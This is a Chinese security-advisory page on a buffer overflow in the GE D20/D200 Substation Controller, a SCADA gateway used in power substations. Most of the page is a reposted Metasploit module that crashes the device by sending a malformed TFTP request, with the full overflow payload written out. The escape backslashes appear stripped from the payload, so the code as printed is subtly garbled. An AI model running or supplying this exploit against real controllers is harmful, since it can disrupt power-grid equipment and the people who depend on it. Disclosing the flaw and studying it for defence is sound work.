首页 / 操作系统 / Linux / GE Energy D20/D200 Substation Controller缓冲区溢出漏洞

发布日期：2012-04-09
更新日期：2012-04-10受影响系统：
General Electric D20/D200 Substation Controller
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52955D20/D200 Substation Controller是IED的SCADA主站、下流子站和供给器的网关。General Electric （GE） D20ME是GE D20Substation Controller产品的一部分。D20/D200 Substation Controller在实现上存在缓冲区溢出安全漏洞，可导致执行任意代码。<*来源：Reid Wightman
 
  链接：http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-12-019-01A.pdf
*>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！Reid Wightman （）提供了如下测试方法：##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
####
# The General Electric D20 （and possibly other devices） have numerous
# buffer overruns in their TFTP servers and probably other servers.
# There are many buffer overruns like it, but this one is the D20"s
# TFTP Server transfer-mode overflow.
# The filename also suffers from an overrun but seems unlikely to be
# exploitable.
##
require "msf/core"
require "rex/ui/text/shell"
require "rex/proto/tftp"class Metasploit3 < Msf::Auxiliary
include Rex::Ui::Text
include Rex::Proto::TFTP
include Msf::Exploit::Remote::Udp
def initialize（info = {}）
super（update_info（info,
"Name" => "General Electric D20ME TFTP Server Buffer Overflow DoS",
"Description" => %q{
By sending a malformed TFTP request to the GE D20ME, it is possible to crash the
device.This module is based on the original "d20ftpbo.rb" Basecamp module from
DigitalBond.
},
"Author" =>
[
"K. Reid Wightman <wightman[at]digitalbond.com>", # original module
"todb" # Metasploit fixups
],
"License" => MSF_LICENSE,
"References" =>
[
[ "URL", "http://www.digitalbond.com/tools/basecamp/metasploit-modules/" ]
],
"Version" => "$Revision$",
"DisclosureDate" => "Jan 19 2012"
））register_options（
[
OptAddress.new（"LHOST", [false, "The local IP address to bind to"]）,
OptInt.new（"RECV_TIMEOUT", [false, "Time （in seconds） to wait between packets", 3]）,
Opt::RPORT（69）
], self.class）
enddef run
udp_sock = Rex::Socket::Udp.create（
"LocalHost" => datastore["LHOST"] || nil,
"PeerHost" => rhost,
"PeerPort" => rport,
"Context" => {"Msf" => framework, "MsfExploit" => self}
） # No need to rescue, it"s a UDP faux-socket
udp_sock.sendto（payload, rhost, rport）
recv = udp_sock.timed_read（65535, recv_timeout）
if recv and recv.size > 0
udp_sock.sendto（payload, rhost, rport）
else
print_error "#{rhost}:#{rport} - TFTP - No response from the target, aborting."
return
end
print_good "#{rhost}:#{rport} - TFTP - DoS complete, the D20 should fault after a timeout."
enddef recv_timeout
if datastore["RECV_TIMEOUT"].to_i.zero？
3
else
datastore["RECV_TIMEOUT"].to_i.abs
end
enddef payload
"x00x01NVRAM\D20.zlbx00netascii" +
"x80x80x80x80x80x80x80x81x80x80x80x82x80x80x80x83" +
"x80x80x80x84x80x80x80x85x80x80x80x86x80x80x80x87x80x80x80x88" +
"x80x80x80x89x80x80x80x8Ax80x80x80x8Bx80x80x80x8Cx80x80x80x8D" +
"x80x80x80x8Ex80x80x80x8Fx80x80x80x90x80x80x80x91x80x80x80x92" +
"x80x80x80x93x80x80x80x94x80x80x80x95x80x80x80x96x80x80x80x97" +
"x80x80x80x98x80x80x80x99x80x80x80x9Ax80x80x80x9Bx80x80x80x9C" +
"x80x80x80x9Dx80x80x80x9Ex80x80x80x9Fx80x80x80xA0x80x80x80xA1" +
"x80x80x80xA2x80x80x80xA3x80x80x80xA4x80x80x80xA5x80x80x80xA6" +
"x80x80x80xA7x80x80x80xA8x80x80x80x00x80x80x80xAAx80x80x80xAB" +
"x80x80x80xACx80x80x80xADx80x80x80xAEx80x80x80xAFx80x80x80xB0" +
"x80x80x80xB1x80x80x80xB2x80x80x80xB3x80x80x80xB4x80x80x80xB5" +
"x80x80x80xB6x80x80x80xB7x80x80x80xB8x80x80x80xB9x80x80x80xBA" +
"x80x80x80xBBx80x80x80xBCx80x80x80xBDx80x80x80xBEx80x80x80xBF" +
"x80x80x80xC0x80x80x80xC1x80x80x80xC2x80x80x80xC3x80x80x80xC4" +
"x80x80x80xC5x80x80x80xC6x80x80x80xC7x80x80x80xC8x80x80x80xC9" +
"x80x80x80xCAx80x80x80xCBx80x80x80xCCx80x80x80xCDx80x80x80xCE" +
"x80x80x80xCFx80x80x80xD0x80x80x80xD1x80x80x80xD2x80x80x80xD3" +
"x80x80x80xD4x80x80x80xD5x80x80x80xD6x80x80x80xD7x80x80x80xD8" +
"x80x80x80xD9x80x80x80xDAx80x80x80xDBx80x80x80xDCx80x80x80xDD" +
"x80x80x80xDEx80x80x80x00x00x00x80x00x00x01x80xE1x80x80x80xE2" +
"x80x80x80xE3x80x80x80xE4x80x80x80xE5x80x80x80xE6x80x80x80xE7" +
"x80x80x80xE8x80x80x80xE9x80x80x80xEAx80x80x80xEBx80x80x80xEC" +
"x80x80x00x80x00x00x00x7FxFFxBCx80xEFx80x80x80xF0x80x80x80xF1" +
"x80x80x80xF2x80x80x80xF3x80x80x80xF4x80x80x80xF5x80x80x80xF6" +
"x80x80x80xF7x80x80x80xF8x80x80x80xF9x80x80x80xFAx80x80x80xFB" +
"x80x80x80xFCx80x80x80xFDx80x80x80xFEx80x80x81x80x80x80x81x81" +
"x80x80x81x82x80x80x81x83x80x80x81x84x80x80x81x85x80x80x81x86" +
"x80x80x81x87x80x80x81x88x80x80x81x89x80x80x81x8Ax80x80x81x8B" +
"x80x80x81x8Cx80x80x81x8Dx80x80x81x8Ex80x80x81x8Fx80x80x81x90" +
"x80x80x81x91x80x80x81x92x80x80x81x93x80x80x81x94x80x80x81x95" +
"x80x80x81x96x80x80x81x97x80x80x81x98x80x80x81x99x80x80x81x9A" +
"x80x80x81x9Bx80x80x81x9Cx80x80x81x9Dx80x80x81x9Ex80x80x81x9F" +
"x80x80x81xA0x80x80x81xA1x80x80x81xA2x80x80x81xA3x80x80x81xA4" +
"x80x80x81xA5x80x80x81xA6x80x80x81xA7x80x80x81xA8x80x80x81xA9" +
"x80x80x81xAAx80x80x81xABx80x80x81xACx80x80x81xADx80x80x81xAE" +
"x80x80x81xAFx80x80x81xB0x80x80x81xB1x80x80x81xB2x80x80x81xB3" +
"x80x80x81xB4x80x80x81xB5x80x80x81xB6x80x80x81xB7x80x80x81xB8" +
"x80x80x81xB9x80x80x81xBAx80x80x81xBBx80x80x81xBCx80x80x81xBD" +
"x80x80x81xBEx80x80x81xBFx80x80x81xC0x80x80x81xC1x80x80x81xC2" +
"x80x80x81xC3x80x80x81xC4x80x80x81xC5x80x80x81xC6x80x80x81xC7" +
"x80x80x81xC8x80x80x81xC9x80x80x81xCAx80x80x81xCBx80x80x81xCC" +
"x80x80x81xCDx80x80x81xCEx80x80x81xCFx80x80x81xD0x80x80x81xD1" +
"x80x80x81xD2x80x80x81xD3x80x80x81xD4x80x80x81xD5x80x80x81xD6" +
"x80x80x81xD7x80x80x81xD8x80x80x81xD9x80x80x81xDAx80x80x81xDB" +
"x80x80x81xDCx80x80x81xDDx80x80x81xDEx80x80x81xDFx80x80x81xE0" +
"x80x80x81xE1x80x80x81xE2x80x80x81xE3x80x80x81xE4x80x80x81xE5" +
"x80x80x81xE6x80x80x81xE7x80x80x81xE8x80x80x81xE9x80x80x81xEA" +
"x80x80x81xEBx80x80x81xECx80x80x81xEDx80x80x81xEEx80x80x81xEF" +
"x80x80x81xF0x80x80x81xF1x80x80x81xF2x80x80x81xF3x80x80x81xF4" +
"x80x80x81xF5x80x80x81xF6x80x80x81xF7x80x80x81xF8x80x80x81xF9" +
"x80x80x81xFAx80x80x81xFBx80x80x81xFCx80x80x81xFDx80x80x81xFE" +
"x80x80x82x80x80x80x82x81"
endend建议：
--------------------------------------------------------------------------------
厂商补丁：General Electric
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.ge-ip.com/products/2420RealNetworks Helix Server多个远程安全漏洞Samba 3.0.x至3.6.3版本ndr_pull_lsa_SidArray堆溢出漏洞（CVE-2012-1182）相关资讯      溢出漏洞 

波音787发电机控制单元整数溢出漏  （05/04/2015 18:47:00） ALLMediaServer栈缓冲区溢出漏洞  （07/18/2012 09:36:26） IrfanView Formats PlugIn "NCSEcw  （06/06/2012 01:44:08）

Squashfs “unsquashfs”整数溢出  （07/24/2012 08:36:14） Sielco Sistemi Winlog Lite缓冲区  （06/12/2012 09:58:40） IrfanView Formats PlugIn TTF文件  （06/05/2012 08:22:19）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图